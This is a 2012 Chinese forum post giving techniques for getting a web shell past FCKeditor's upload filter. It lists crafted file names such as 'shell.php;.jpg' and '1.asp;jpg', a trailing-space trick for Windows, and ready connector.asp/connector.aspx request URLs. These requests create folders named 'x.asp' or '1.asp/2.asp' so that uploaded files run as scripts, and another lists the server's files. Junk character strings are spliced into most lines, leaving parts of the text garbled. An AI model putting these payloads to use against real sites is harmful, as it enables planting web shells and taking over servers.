很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg* L$ y0 B0 G/ J) f( Q/ j
% H- I6 b. h: o! s
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。) ~4 D% N+ R& K4 W
, F9 q8 l. F0 F( q% n继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
; A/ {" |: M0 d9 @3 R# a8 o- B2 ]& `. B. x0 ~* U/ r* |/ K
突破建立文件夹:1 u" t# ?4 u F5 x+ M1 P
; C8 }, E8 C; P1 }( Q6 J) F# S6 qeditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp& m4 T- _7 q; p$ o& P$ O
- X' d, a6 _2 Y) a7 o
参数:
" D5 F) D$ L9 a( R' }' }
8 ^) {' \/ M) e& ` r当前目录名:CurrentFolder=/qing.asp
+ g4 S3 j5 K: K0 W7 T" A& }' V6 M: \4 i# X
新的目录名:NewFolderName=x.asp+ @$ n/ M9 m+ T( E
/ b* J& j, Z+ t ]2 X% L1 K7 P" ^+ A
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……: ^& I3 \' y4 v! k
/ u% f: [/ J) @+ r那么 x.asp 就已经建立生成了,此方法百试百灵!5 }" Q: {; W- C, j! t8 D
" Q1 v* D8 A. t( v
新建文件夹参数 x.asp,基本都能搞定。5 Q. z; H. P8 d* |) n9 Z% E8 D4 @
& [" n- s3 u3 N {
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
% f$ ?+ e; i" ^2 [3 Y) c7 |' T9 a( h8 j3 ]6 ?
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp: J4 ^8 Q1 x1 d: K# R# F* \- a$ B$ `
, O$ @/ O' ?- F0 H4 c
获取文件列表
! k Y# ^8 |+ |; T! ? aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
9 D- O+ S) F. K7 k+ s* N, G" z# [. O- a. y0 }1 L: I8 V; }
|
发表于 2012-12-31 09:27:09
收藏
支持
反对